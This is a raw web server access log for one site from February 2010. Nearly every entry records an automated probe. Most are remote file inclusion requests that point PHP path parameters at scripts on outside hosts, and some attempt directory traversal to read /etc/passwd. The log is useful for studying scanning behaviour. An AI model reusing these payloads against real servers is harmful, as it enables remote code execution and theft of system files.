195.184.217.50 - - [13/Feb/2010:07:43:09 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:07:43:09 -0800] "GET /logs/access_100112.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:07:43:09 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:43:10 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:43:10 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:43:10 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:43:14 -0800] "GET /logs/access_100104.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:43:40 -0800] "GET /logs/access_100104.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:44:24 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:44:24 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:44:24 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:44:36 -0800] "GET /logs/access_100107.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:44:38 -0800] "GET /logs/access_100104.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:44:56 -0800] "GET /logs///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:44:56 -0800] "GET /logs/access.log%20%20///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:44:56 -0800] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:45:25 -0800] "GET /logs/access_100109.log%20%20///administrator/components/com_moofaq/css/file_includer.php?file=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:07:47:41 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:07:47:41 -0800] "GET /e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:07:47:41 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:07:47:48 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:07:48:22 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:07:48:22 -0800] "GET /bbs/write_update.php?board_skin_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:07:48:22 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:49:17 -0800] "GET /administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:49:17 -0800] "GET /logs//administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:49:17 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:49:36 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:07:49:44 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:50:26 -0800] "GET /administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:50:26 -0800] "GET /logs//administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:50:26 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:50:37 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.30.148 - - [13/Feb/2010:07:51:10 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:07:51:11 -0800] "GET /logs/access_100118.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:07:51:11 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:07:51:11 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:07:51:54 -0800] "GET /logs/access_100109.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:07:52:42 -0800] "GET /logs/////write_update.php?board_skin_path=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:07:52:42 -0800] "GET ////write_update.php?board_skin_path=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:07:52:42 -0800] "GET /logs/access_100125.log%20%20/////write_update.php?board_skin_path=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:07:52:49 -0800] "GET /logs/access_100120.log%20%20/////write_update.php?board_skin_path=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:07:52:53 -0800] "GET /logs/////write_update.php?board_skin_path=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:07:52:53 -0800] "GET /logs/access_100125.log%20%20/////write_update.php?board_skin_path=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:07:52:53 -0800] "GET ////write_update.php?board_skin_path=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:07:52:56 -0800] "GET /logs/access_100127.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:07:52:56 -0800] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.0" 200 4796 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:07:52:57 -0800] "GET /////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:07:53:01 -0800] "GET /logs/access_100120.log%20%20/////write_update.php?board_skin_path=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.30.148 - - [13/Feb/2010:07:53:09 -0800] "GET /ideal/forum/viewtopic.php?p=18084 HTTP/1.1" 404 5258 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:07:53:16 -0800] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:07:53:16 -0800] "GET /logs/access_100114.log//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:07:53:16 -0800] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:07:53:31 -0800] "GET /logs/access_100127.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:07:53:31 -0800] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 4812 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:07:53:31 -0800] "GET /////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [13/Feb/2010:07:53:32 -0800] "GET /logs/access_100121.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [13/Feb/2010:07:53:36 -0800] "GET /logs/access_100207.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [13/Feb/2010:07:53:36 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [13/Feb/2010:07:53:36 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:07:54:05 -0800] "GET /logs/access_100111.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:07:54:06 -0800] "GET /logs/access_100111.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:54:23 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:54:23 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:54:23 -0800] "GET /logs/access_100120.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:07:54:29 -0800] "GET /logs/access_100124.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:07:54:33 -0800] "GET /logs/access_100112.log//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:07:54:33 -0800] "GET /board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:07:54:33 -0800] "GET /logs//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [13/Feb/2010:07:54:35 -0800] "GET /bbs/write_update.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
82.151.132.176 - - [13/Feb/2010:07:54:35 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
82.151.132.176 - - [13/Feb/2010:07:54:35 -0800] "GET /logs//bbs/write_update.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:54:40 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:54:40 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:54:40 -0800] "GET /logs/access_100120.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [13/Feb/2010:07:55:02 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.119.103.16 - - [13/Feb/2010:07:55:04 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [13/Feb/2010:07:55:04 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [13/Feb/2010:07:55:04 -0800] "GET /logs/access_100207.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:07:55:16 -0800] "GET /logs/access_100127.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:55:35 -0800] "GET /logs/access_100114.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:55:38 -0800] "GET /logs/access_100114.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:07:55:54 -0800] "GET /logs/access_100203.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:56:03 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:56:03 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:56:03 -0800] "GET /logs/access_100120.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:56:26 -0800] "GET /logs/access_100123.log//administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:07:56:31 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.170.89.6 - - [13/Feb/2010:07:56:50 -0800] "GET /logs/access_100104.log//administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [13/Feb/2010:07:56:51 -0800] "GET /logs/access_100107.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [13/Feb/2010:07:56:51 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [13/Feb/2010:07:56:51 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:57:03 -0800] "GET /logs/access_100107.log//administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:57:05 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:57:05 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:57:05 -0800] "GET /logs/access_100120.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:57:11 -0800] "GET /logs/access_100114.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:57:36 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:57:36 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:57:36 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:57:38 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:57:39 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:57:40 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:07:58:22 -0800] "GET /logs/access_100114.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:58:30 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:58:30 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:58:30 -0800] "GET /logs/access_100124.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:07:58:53 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:07:58:54 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:07:58:54 -0800] "GET /logs/access_100104.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:07:58:59 -0800] "GET /?errors.php=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 200 3626 "-" "libwww-perl/5.53" "www.puaga.com"
